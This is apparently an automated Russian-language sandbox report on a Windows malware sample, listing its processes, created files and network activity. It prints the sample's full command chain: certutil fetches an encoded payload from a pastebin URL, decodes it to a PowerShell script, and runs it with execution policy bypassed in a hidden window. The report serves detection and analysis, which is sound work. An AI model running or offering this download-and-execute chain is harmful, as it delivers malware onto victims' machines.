Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /kcertutil -urlcache -split -f https://pastebin.com/raw/XkgrNh0D c:\users\public\payload.enc& certutil -f -decode c:\users\public\payload.enc c:\users\public\string.ps1& powershell -executionpo...
Изменения в файловой системе
Создает следующие файлы
- C:\users\public\payload.enc
- C:\users\public\string.ps1
Сетевая активность
TCP
Запросы HTTP GET
- http://oc##.#tartssl.com/sub/class2/code/ca/MEMwQTA%2FMD0wOzAJBgUrDgMCGgUABBQSOgrhRCSnWfKxoWTjWxhk8hga9AQU0E4PQJlsuEsZbzsouODjiAc0qrcCAhAV
UDP
- DNS ASK pa###bin.com
- DNS ASK co#.###ooriemail.com
- DNS ASK oc##.#tartssl.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -executionpolicy bypass -c iex c:\users\public\string.ps1
- '<SYSTEM32>\cmd.exe' /kcertutil -urlcache -split -f https://pastebin.com/raw/XkgrNh0D c:\users\public\payload.enc& certutil -f -decode c:\users\public\payload.enc c:\users\public\string.ps1& powershell -executionpo...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\certutil.exe' -urlcache -split -f https://pastebin.com/raw/XkgrNh0D c:\users\public\payload.enc
- '<SYSTEM32>\certutil.exe' -f -decode c:\users\public\payload.enc c:\users\public\string.ps1
